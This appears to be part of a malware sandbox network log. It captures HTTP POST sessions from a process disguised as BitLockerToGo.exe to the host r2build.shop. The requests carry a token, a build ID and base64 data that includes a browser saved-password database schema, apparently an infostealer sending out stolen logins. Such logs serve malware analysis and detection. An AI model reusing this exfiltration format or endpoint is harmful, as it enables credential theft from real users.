                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                    Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:49 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    15192.168.2.44976894.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:49 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----f3ekn7q1vs0riek6pppp
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 55081
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 66 33 65 6b 6e 37 71 31 76 73 30 72 69 65 6b 36 70 70 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 66 33 65 6b 6e 37 71 31 76 73 30 72 69 65 6b 36 70 70 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 66 33 65 6b 6e 37 71 31 76 73 30 72 69 65 6b 36 70 70 70 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------f3ekn7q1vs0riek6ppppContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------f3ekn7q1vs0riek6ppppContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------f3ekn7q1vs0riek6ppppCont
                                                                                                                                                                                                                                    2025-01-09 13:01:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:49 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:49 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:50 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    16192.168.2.44976994.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----gvs00r1nym79rq1vs0zu
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 142457
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 67 76 73 30 30 72 31 6e 79 6d 37 39 72 71 31 76 73 30 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 67 76 73 30 30 72 31 6e 79 6d 37 39 72 71 31 76 73 30 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 67 76 73 30 30 72 31 6e 79 6d 37 39 72 71 31 76 73 30 7a 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------gvs00r1nym79rq1vs0zuContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------gvs00r1nym79rq1vs0zuContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------gvs00r1nym79rq1vs0zuCont
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
